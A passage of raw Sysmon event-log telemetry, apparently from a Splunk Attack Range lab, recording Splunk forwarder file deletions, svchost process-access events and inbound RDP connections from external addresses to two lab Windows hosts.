Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BFF3E9DE87D45494C107F26D5E8C6C4,SHA256=85A17BBBB5381DCAA0E8D5E76B5A3DF3D8F0E52DCEBF2AD851985783D271511E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:05.240{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=783A0B2D00394AE2BE35A0B632FE1207,SHA256=4513C83339234BF41A7F74B0A44AB22CDCCBD426D208B731D4E9691966900F0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:06.355{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7474D7CCB835BAFF846B37BC95C80B,SHA256=4D160207BE539034A8E9BE4474155A68FCAB5574D04C0AB77E1E63B7A5149EEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977391Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:06.309{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3529506C36AE9B8674F9A76F724B2AC,SHA256=6B999D2F5D0F1F09863206D5895E384F3BEBB8CD2A06446186AD46279B7F2184,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977395Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:07.700{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977394Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:07.700{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977393Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:07.700{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977392Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:07.309{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C78D524EC128C5BB26B16D66EBAC59EA,SHA256=E1C64E15F1CC6447F690080571AA16FF8AF6BD1B2607A380609CCCC92187F830,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:07.370{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929B95133C2EA33965385E020B194628,SHA256=3503300E01477C1025786BB12FE72AB86F27A81857A1D2E3B667C3DC6B50B922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:08.569{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3475B1322819180B6B0816E739FFE8B6,SHA256=35587BF49C8F4CC94750F4ADD4A0F1401BF359239E152DFC399346F3E9E25EF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:08.404{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0F562A05F6FA4D100928B132C673CF9,SHA256=9038AB5426E6493B7E74FA1762E41825FE423C963C5A4CD31837A54462D2AD76,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977397Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:05.465{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-37119-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977396Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:08.309{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABF461414AB35AD0678B0F056D997340,SHA256=C621D697872D500AC8835C769E59C4F43B5821F0BF10A15015384B73E360B52E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:08.041{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62378-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:09.683{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39E4379288A9F7D96E38A8C817B543BD,SHA256=BF17B51C5C567BC536247A8E7E46CAC9E6CC55BEC8399797C167921A3746C84A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:09.552{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A7734344EC87F44C9C2C8A1F1A8616A,SHA256=6CDD27BD15049729CD815907955203C7BE5411BB6783258A404394C066D5FD5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977401Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:06.860{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59302-false10.0.1.12-8000- 354300x8000000000000000977400Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:06.368{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61951-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977399Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:09.325{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017C21A58EE6F8AE58E77A27D7C6F08C,SHA256=A9E9E0D8E08DE4CD629878DCC7230F35579193F9CE2FCC10E5C46463A218B302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977398Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:09.231{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CE9A3E17C2E52E72A8C28D95AB7AC73,SHA256=AA89510A060E4C5D2F67B7DC28A3FBE9C79112BD91A62DA866E2543FEFA058AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:10.552{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0609A3DE334A7AFA6128EBE90BE1311,SHA256=CFC63BA5EF5394AA544344811E9DD2222161E02A167183F34438D7611825BC7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977403Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:10.590{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBFBBF8267B54AC9414BF99064FDB52C,SHA256=292EB097ED00470511E04E5F995B468065099B85B686F73BDF1DB7CC0544A0EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977402Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:10.325{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC1D1BAE47AFF58445DFF238A797BC44,SHA256=67024C37B2BDA0695435E9629604A878A9EC8AFF0992B619EA32057ED730BCF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:11.582{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19C23FD25CD612FB4B442565ECBB4B98,SHA256=131A51FAE87A22819C620D518992805ABE45B8623B9B33DADFC639604D6056FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977404Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:11.340{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AE475C73DD10A2C1B86923356DE05EE,SHA256=D897D34B893CDD91963BBC085231DF15699FC8784568BD154DE374214C2C6A7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:12.723{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=321B28BBC11271DBF7BDEA81C910698F,SHA256=84075E23697F9DECEB837A0072C89C8500013695662702024E03161146830A8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977406Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:12.793{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=737D9483CF8FCF4B16D9261B9488DC05,SHA256=78367A1CAD782CF5FF51B711F4834ED1DEA6240FBDED019296241EE06E3362DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977405Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:12.356{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C704683624511F2F358BD8703CCC0239,SHA256=FDC48E2916ECBBA89203FAE180CA162D1E650E7BB6B31BC4E9938BE1091578BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:09.795{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53259-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:13.754{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACAEB3B46DD34E6371E9F2C7B4DBA4EC,SHA256=6173E81C4B22040F4E9A36FEC55C7D7EB7944901BCEC10DEAE77479D152EF4E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977409Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:13.543{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977408Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:13.371{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=230D940CD69A0278787171A93F5CE4B3,SHA256=81020D6CDE3E1CE59D094383A7D36D5B76D15B67A20424265D4D54E3FDD162EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977407Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:09.617{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-8137-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048793Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:14.757{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579ED770BC30234AE1E721036B571CCE,SHA256=4B862A39054A20D1E3D1AA76E649265AEC447E75D68C51B1D8B56CC70080F0E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977410Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:14.371{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642201C9DC76F3CB795B5CF3D14511BB,SHA256=8DDE15DAE2737B56D721359C2D8FE5C48371C1917414719A9CD2C7BE5C853312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:14.541{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=923D0AAC301AC02BCBBE518A852DD407,SHA256=236AB061387A43944359973A8A7F0106BB03490A200BF3661BDD7EDFFA3E28BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:15.788{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A6140D2627162BE1701C496AE53AD3,SHA256=20BFD0E5A0383DFDFD0E8B616CCF8D880EE8F3E2492DE3B5D5E6E547AB532B3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977415Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:15.387{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=342BDBFAFD2468BBEEBC80A0798B8E64,SHA256=F4AEED53FD56FA440A6E9D79E65CAD66023BAD18C79266551D556F4709CE73E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977414Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:12.172{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59304-false10.0.1.12-8089- 354300x8000000000000000977413Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:11.891{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59303-false10.0.1.12-8000- 354300x8000000000000000977412Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:11.825{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-20916-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:12.989{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64124-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:12.457{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65053-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048794Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:12.413{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse103.24.1.102-51082-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000977411Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:15.028{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93ED2F6CE956ABF0168C0248015B1B0B,SHA256=528CEF2C7A6D012A5A76B2264970FD1B00DCC99E59644D8ABCEF14EAFB1AA0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048799Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:16.806{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAFB59E6637B0BC87321B3DA7C9865E2,SHA256=08505C401E9401D28F93790B3688F9D4F1962933140085797A70946E64E269C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977417Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:12.592{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de49520-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977416Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:16.403{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E814BC1BE8C5E39F3B3DEFE5E92A6F3,SHA256=02A39B4DA0DE82CAAE76359FB42F90793F2B0D9449E8530048331CCB6EEE761A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048798Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:16.241{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE6D254024EC7218CDA2E8033C98D099,SHA256=1383751FCDED91E090FA32ED7BAD636A3395194FB08870130FA4FB0A746C61C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048802Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:17.824{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A1D5242086F7D93646E3E9A183476B,SHA256=A2AA5E3B39BE79BEB51CB2614698B6E1266A2A22D0C59BAE48693CDE6D35DEC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977419Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:17.434{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F328103FEF96685BED0E00C7AD01BA27,SHA256=E23065DD7BA88A750B29D8B842E04456FAA73428E1B8960E4EBCEF5CD6A5FCF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977418Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:17.418{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D04F207A48FC3E1C5522956C02F0FA5,SHA256=6A82A6D8DE0865F1ED1AF8A38C80F0EFC545B50C7F876B308DD74E00F43E518E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048801Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:17.325{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 